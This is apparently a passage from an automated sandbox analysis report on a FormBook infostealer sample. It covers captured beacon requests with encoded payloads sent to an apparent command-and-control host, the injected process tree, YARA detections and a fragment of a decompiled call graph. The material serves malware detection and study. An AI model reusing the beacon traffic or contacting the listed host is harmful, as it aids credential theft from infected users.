                                                                                    Data Ascii: Ubhdm=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2Z4DLsRiX3Lp0HW7TCxYtU4ZQ0Z76PIyBxrpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqcFpInCSSLUBZtWl9VprTKhZgTSWvD2RlFYmMA7+Lb5PGcmVjWkVmxFmylchMU6MdzfC5pclVzpVEPCUK6M4jzo7tIG1s1O1ak4ykjdpyQ9xtDHHQA93zk4EKjkjKhMy49kY9AeVOS1QFlhCJ7NWY+WS6g/g4IfKQ6nMXtOfp1me9SuV4isExiAMQadOxuYpDdpEc9j4BkSGpFubTofCJvLdpYJtd10AQEJ3+cC2GenvzPy0w2VUmnJZV39NWexe2UiH1QCirMz0q9LbeNXooO6lJV/pgXoootP/t8LClJ0Bg/pKgJuDs76xxp8mEJB3/aVWJ6Jof4nmtHkIlH/KY8jN+pyVZl5f9G2CT0FNl7QuENSPqexlnbd1z7d6vtPZoC+knFtqLdqVS33jhJj4f5JK1m3UuFc+glIDn+MQbeUwvRUTjLfJ2b3gUIqRnLKFq+crb6I2ceLGKWUvw13hsdGwo7rTrDG6r3waLOwS3BN29x731ATO6CO8B0CiGE7uVORxZRW2Yk9L4 [TRUNCATED]
                                                                                    Jan 8, 2025 15:02:37.636917114 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:37 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.550000217.196.55.202803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:39.566620111 CET518OUTGET /fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.empowermedeco.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:02:40.141056061 CET1235INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:40 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:08:58:56
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Users\user\Desktop\BP-50C26_20241220_082241.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
                                                                                    Imagebase:0xc10000
                                                                                    File size:1'565'696 bytes
                                                                                    MD5 hash:33D01C02E1BB141330AA8BE95C21F1BF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:08:58:57
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
                                                                                    Imagebase:0x510000
                                                                                    File size:46'504 bytes
                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:08:59:04
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe"
                                                                                    Imagebase:0x930000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:08:59:06
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                    Imagebase:0xd0000
                                                                                    File size:22'016 bytes
                                                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:08:59:19
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe"
                                                                                    Imagebase:0x930000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:08:59:31
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff79f9e0000
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.7%
                                                                                      Dynamic/Decrypted Code Coverage:2%
                                                                                      Signature Coverage:3.1%
                                                                                      Total number of Nodes:1666
                                                                                      Total number of Limit Nodes:37
                                                                                      execution_graph 96499 c52ba5 96500 c12b25 96499->96500 96501 c52baf 96499->96501 96527 c12b83 7 API calls 96500->96527 96542 c13a5a 96501->96542 96505 c52bb8 96549 c19cb3 96505->96549 96508 c12b2f 96517 c12b44 96508->96517 96531 c13837 96508->96531 96509 c52bc6 96510 c52bf5 96509->96510 96511 c52bce 96509->96511 96513 c133c6 22 API calls 96510->96513 96555 c133c6 96511->96555 96525 c52bf1 GetForegroundWindow ShellExecuteW 96513->96525 96518 c12b5f 96517->96518 96541 c130f2 Shell_NotifyIconW ___scrt_fastfail 96517->96541 96523 c12b66 SetCurrentDirectoryW 96518->96523 96522 c133c6 22 API calls 96522->96525 96526 c12b7a 96523->96526 96524 c52c26 96524->96518 96525->96524 96573 c12cd4 7 API calls 96527->96573 96529 c12b2a 96530 c12c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96529->96530 96530->96508 96532 c13862 ___scrt_fastfail 96531->96532 96574 c14212 96532->96574 96535 c138e8 96537 c53386 Shell_NotifyIconW 96535->96537 96538 c13906 Shell_NotifyIconW 96535->96538 96578 c13923 96538->96578 96540 c1391c 96540->96517 96541->96518 96668 c51f50 96542->96668 96545 c19cb3 22 API calls 96546 c13a8d 96545->96546 96670 c13aa2 96546->96670 96548 c13a97 96548->96505 96550 c19cc2 _wcslen 96549->96550 96551 c2fe0b 22 API calls 96550->96551 96552 c19cea __fread_nolock 96551->96552 96553 c2fddb 22 API calls 96552->96553 96554 c19d00 96553->96554 96554->96509 96556 c133dd 96555->96556 96557 c530bb 96555->96557 96690 c133ee 96556->96690 96559 c2fddb 22 API calls 96557->96559 96561 c530c5 _wcslen 96559->96561 96560 c133e8 96564 c16350 96560->96564 96562 c2fe0b 22 API calls 96561->96562 96563 c530fe __fread_nolock 96562->96563 96565 c16362 96564->96565 96566 c54a51 96564->96566 96705 c16373 96565->96705 96715 c14a88 22 API calls __fread_nolock 96566->96715 96569 c1636e 96569->96522 96570 c54a5b 96571 c54a67 96570->96571 96572 c1a8c7 22 API calls 96570->96572 96572->96571 96573->96529 96575 c535a4 96574->96575 96576 c138b7 96574->96576 96575->96576 96577 c535ad DestroyIcon 96575->96577 96576->96535 96600 c7c874 42 API calls _strftime 96576->96600 96577->96576 96579 c1393f 96578->96579 96597 c13a13 96578->96597 96601 c16270 96579->96601 96582 c53393 LoadStringW 96585 c533ad 96582->96585 96583 c1395a 96606 c16b57 96583->96606 96593 c13994 ___scrt_fastfail 96585->96593 96618 c1a8c7 96585->96618 96586 c1396f 96587 c533c9 96586->96587 96588 c1397c 96586->96588 96591 c16350 22 API calls 96587->96591 96588->96585 96590 c13986 96588->96590 96592 c16350 22 API calls 96590->96592 96594 c533d7 96591->96594 96592->96593 96596 c139f9 Shell_NotifyIconW 96593->96596 96594->96593 96595 c133c6 22 API calls 96594->96595 96598 c533f9 96595->96598 96596->96597 96597->96540 96599 c133c6 22 API calls 96598->96599 96599->96593 96600->96535 96622 c2fe0b 96601->96622 96603 c16295 96632 c2fddb 96603->96632 96605 c1394d 96605->96582 96605->96583 96607 c54ba1 96606->96607 96608 c16b67 _wcslen 96606->96608 96658 c193b2 96607->96658 96611 c16ba2 96608->96611 96612 c16b7d 96608->96612 96610 c54baa 96610->96610 96614 c2fddb 22 API calls 96611->96614 96657 c16f34 22 API calls 96612->96657 96616 c16bae 96614->96616 96615 c16b85 __fread_nolock 96615->96586 96617 c2fe0b 22 API calls 96616->96617 96617->96615 96619 c1a8ea __fread_nolock 96618->96619 96620 c1a8db 96618->96620 96619->96593 96620->96619 96621 c2fe0b 22 API calls 96620->96621 96621->96619 96624 c2fddb 96622->96624 96625 c2fdfa 96624->96625 96628 c2fdfc 96624->96628 96642 c3ea0c 96624->96642 96649 c34ead 7 API calls 2 library calls 96624->96649 96625->96603 96627 c3066d 96651 c332a4 RaiseException 96627->96651 96628->96627 96650 c332a4 RaiseException 96628->96650 96631 c3068a 96631->96603 96634 c2fde0 96632->96634 96633 c3ea0c ___std_exception_copy 21 API calls 96633->96634 96634->96633 96635 c2fdfa 96634->96635 96638 c2fdfc 96634->96638 96654 c34ead 7 API calls 2 library calls 96634->96654 96635->96605 96637 c3066d 96656 c332a4 RaiseException 96637->96656 96638->96637 96655 c332a4 RaiseException 96638->96655 96641 c3068a 96641->96605 96647 c43820 IsInExceptionSpec 96642->96647 96643 c4385e 96653 c3f2d9 20 API calls _free 96643->96653 96645 c43849 RtlAllocateHeap 96646 c4385c 96645->96646 96645->96647 96646->96624 96647->96643 96647->96645 96652 c34ead 7 API calls 2 library calls 96647->96652 96649->96624 96650->96627 96651->96631 96652->96647 96653->96646 96654->96634 96655->96637 96656->96641 96657->96615 96659 c193c9 __fread_nolock 96658->96659 96660 c193c0 96658->96660 96659->96610 96660->96659 96662 c1aec9 96660->96662 96663 c1aed9 __fread_nolock 96662->96663 96664 c1aedc 96662->96664 96663->96659 96665 c2fddb 22 API calls 96664->96665 96666 c1aee7 96665->96666 96667 c2fe0b 22 API calls 96666->96667 96667->96663 96669 c13a67 GetModuleFileNameW 96668->96669 96669->96545 96671 c51f50 __wsopen_s 96670->96671 96672 c13aaf GetFullPathNameW 96671->96672 96673 c13ae9 96672->96673 96674 c13ace 96672->96674 96684 c1a6c3 96673->96684 96675 c16b57 22 API calls 96674->96675 96677 c13ada 96675->96677 96680 c137a0 96677->96680 96681 c137ae 96680->96681 96682 c193b2 22 API calls 96681->96682 96683 c137c2 96682->96683 96683->96548 96685 c1a6d0 96684->96685 96686 c1a6dd 96684->96686 96685->96677 96687 c2fddb 22 API calls 96686->96687 96688 c1a6e7 96687->96688 96689 c2fe0b 22 API calls 96688->96689 96689->96685 96691 c133fe _wcslen 96690->96691 96692 c13411 96691->96692 96693 c5311d 96691->96693 96700 c1a587 96692->96700 96695 c2fddb 22 API calls 96693->96695 96697 c53127 96695->96697 96696 c1341e __fread_nolock 96696->96560 96698 c2fe0b 22 API calls 96697->96698 96699 c53157 __fread_nolock 96698->96699 96701 c1a59d 96700->96701 96704 c1a598 __fread_nolock 96700->96704 96702 c5f80f 96701->96702 96703 c2fe0b 22 API calls 96701->96703 96703->96704 96704->96696 96707 c16382 96705->96707 96711 c163b6 __fread_nolock 96705->96711 96706 c54a82 96709 c2fddb 22 API calls 96706->96709 96707->96706 96708 c163a9 96707->96708 96707->96711 96710 c1a587 22 API calls 96708->96710 96712 c54a91 96709->96712 96710->96711 96711->96569 96713 c2fe0b 22 API calls 96712->96713 96714 c54ac5 __fread_nolock 96713->96714 96715->96570 96716 c12de3 96717 c12df0 __wsopen_s 96716->96717 96718 c12e09 96717->96718 96719 c52c2b ___scrt_fastfail 96717->96719 96720 c13aa2 23 API calls 96718->96720 96722 c52c47 GetOpenFileNameW 96719->96722 96721 c12e12 96720->96721 96732 c12da5 96721->96732 96724 c52c96 96722->96724 96726 c16b57 22 API calls 96724->96726 96728 c52cab 96726->96728 96728->96728 96729 c12e27 96750 c144a8 96729->96750 96733 c51f50 __wsopen_s 96732->96733 96734 c12db2 GetLongPathNameW 96733->96734 96735 c16b57 22 API calls 96734->96735 96736 c12dda 96735->96736 96737 c13598 96736->96737 96780 c1a961 96737->96780 96740 c13aa2 23 API calls 96741 c135b5 96740->96741 96742 c135c0 96741->96742 96743 c532eb 96741->96743 96785 c1515f 96742->96785 96747 c5330d 96743->96747 96797 c2ce60 41 API calls 96743->96797 96749 c135df 96749->96729 96798 c14ecb 96750->96798 96753 c53833 96820 c82cf9 96753->96820 96755 c14ecb 94 API calls 96757 c144e1 96755->96757 96756 c53848 96758 c5384c 96756->96758 96759 c53869 96756->96759 96757->96753 96760 c144e9 96757->96760 96870 c14f39 96758->96870 96762 c2fe0b 22 API calls 96759->96762 96763 c53854 96760->96763 96764 c144f5 96760->96764 96770 c538ae 96762->96770 96876 c7da5a 82 API calls 96763->96876 96869 c1940c 136 API calls 2 library calls 96764->96869 96767 c53862 96767->96759 96768 c12e31 96769 c53a5f 96772 c53a67 96769->96772 96770->96769 96770->96772 96777 c19cb3 22 API calls 96770->96777 96846 c7967e 96770->96846 96849 c80b5a 96770->96849 96855 c1a4a1 96770->96855 96863 c13ff7 96770->96863 96877 c795ad 42 API calls _wcslen 96770->96877 96771 c14f39 68 API calls 96771->96772 96772->96771 96878 c7989b 82 API calls __wsopen_s 96772->96878 96777->96770 96781 c2fe0b 22 API calls 96780->96781 96782 c1a976 96781->96782 96783 c2fddb 22 API calls 96782->96783 96784 c135aa 96783->96784 96784->96740 96786 c1516e 96785->96786 96790 c1518f __fread_nolock 96785->96790 96788 c2fe0b 22 API calls 96786->96788 96787 c2fddb 22 API calls 96789 c135cc 96787->96789 96788->96790 96791 c135f3 96789->96791 96790->96787 96792 c13605 96791->96792 96796 c13624 __fread_nolock 96791->96796 96794 c2fe0b 22 API calls 96792->96794 96793 c2fddb 22 API calls 96795 c1363b 96793->96795 96794->96796 96795->96749 96796->96793 96797->96743 96879 c14e90 LoadLibraryA 96798->96879 96803 c14ef6 LoadLibraryExW 96887 c14e59 LoadLibraryA 96803->96887 96804 c53ccf 96806 c14f39 68 API calls 96804->96806 96808 c53cd6 96806->96808 96810 c14e59 3 API calls 96808->96810 96812 c53cde 96810->96812 96811 c14f20 96811->96812 96813 c14f2c 96811->96813 96909 c150f5 96812->96909 96814 c14f39 68 API calls 96813->96814 96816 c144cd 96814->96816 96816->96753 96816->96755 96819 c53d05 96821 c82d15 96820->96821 96822 c1511f 64 API calls 96821->96822 96823 c82d29 96822->96823 97059 c82e66 96823->97059 96826 c150f5 40 API calls 96827 c82d56 96826->96827 96828 c150f5 40 API calls 96827->96828 96829 c82d66 96828->96829 96830 c150f5 40 API calls 96829->96830 96831 c82d81 96830->96831 96832 c150f5 40 API calls 96831->96832 96833 c82d9c 96832->96833 96834 c1511f 64 API calls 96833->96834 96835 c82db3 96834->96835 96836 c3ea0c ___std_exception_copy 21 API calls 96835->96836 96837 c82dba 96836->96837 96838 c3ea0c ___std_exception_copy 21 API calls 96837->96838 96839 c82dc4 96838->96839 96840 c150f5 40 API calls 96839->96840 96841 c82dd8 96840->96841 96842 c828fe 27 API calls 96841->96842 96844 c82dee 96842->96844 96843 c82d3f 96843->96756 96844->96843 97065 c822ce 96844->97065 96847 c2fe0b 22 API calls 96846->96847 96848 c796ae __fread_nolock 96847->96848 96848->96770 96848->96848 96850 c80b65 96849->96850 96851 c2fddb 22 API calls 96850->96851 96852 c80b7c 96851->96852 96853 c19cb3 22 API calls 96852->96853 96854 c80b87 96853->96854 96854->96770 96856 c1a52b 96855->96856 96861 c1a4b1 __fread_nolock 96855->96861 96858 c2fe0b 22 API calls 96856->96858 96857 c2fddb 22 API calls 96859 c1a4b8 96857->96859 96858->96861 96860 c2fddb 22 API calls 96859->96860 96862 c1a4d6 96859->96862 96860->96862 96861->96857 96862->96770 96864 c1400a 96863->96864 96867 c140ae 96863->96867 96865 c1403c 96864->96865 96866 c2fe0b 22 API calls 96864->96866 96865->96867 96868 c2fddb 22 API calls 96865->96868 96866->96865 96867->96770 96868->96865 96869->96768 96871 c14f43 96870->96871 96873 c14f4a 96870->96873 96872 c3e678 67 API calls 96871->96872 96872->96873 96874 c14f59 96873->96874 96875 c14f6a FreeLibrary 96873->96875 96874->96763 96875->96874 96876->96767 96877->96770 96878->96772 96880 c14ec6 96879->96880 96881 c14ea8 GetProcAddress 96879->96881 96884 c3e5eb 96880->96884 96882 c14eb8 96881->96882 96882->96880 96883 c14ebf FreeLibrary 96882->96883 96883->96880 96917 c3e52a 96884->96917 96886 c14eea 96886->96803 96886->96804 96888 c14e8d 96887->96888 96889 c14e6e GetProcAddress 96887->96889 96892 c14f80 96888->96892 96890 c14e7e 96889->96890 96890->96888 96891 c14e86 FreeLibrary 96890->96891 96891->96888 96893 c2fe0b 22 API calls 96892->96893 96894 c14f95 96893->96894 96985 c15722 96894->96985 96896 c14fa1 __fread_nolock 96897 c14fdc 96896->96897 96898 c150a5 96896->96898 96899 c53d1d 96896->96899 96902 c53d22 96897->96902 96903 c150f5 40 API calls 96897->96903 96907 c1506e messages 96897->96907 96994 c1511f 96897->96994 96988 c142a2 CreateStreamOnHGlobal 96898->96988 96999 c8304d 74 API calls 96899->96999 96904 c1511f 64 API calls 96902->96904 96903->96897 96905 c53d45 96904->96905 96906 c150f5 40 API calls 96905->96906 96906->96907 96907->96811 96910 c15107 96909->96910 96913 c53d70 96909->96913 97021 c3e8c4 96910->97021 96914 c828fe 97042 c8274e 96914->97042 96916 c82919 96916->96819 96919 c3e536 ___scrt_is_nonwritable_in_current_image 96917->96919 96918 c3e544 96942 c3f2d9 20 API calls _free 96918->96942 96919->96918 96921 c3e574 96919->96921 96923 c3e586 96921->96923 96924 c3e579 96921->96924 96922 c3e549 96943 c427ec 26 API calls pre_c_initialization 96922->96943 96934 c48061 96923->96934 96944 c3f2d9 20 API calls _free 96924->96944 96928 c3e58f 96929 c3e5a2 96928->96929 96930 c3e595 96928->96930 96946 c3e5d4 LeaveCriticalSection __fread_nolock 96929->96946 96945 c3f2d9 20 API calls _free 96930->96945 96931 c3e554 __wsopen_s 96931->96886 96935 c4806d 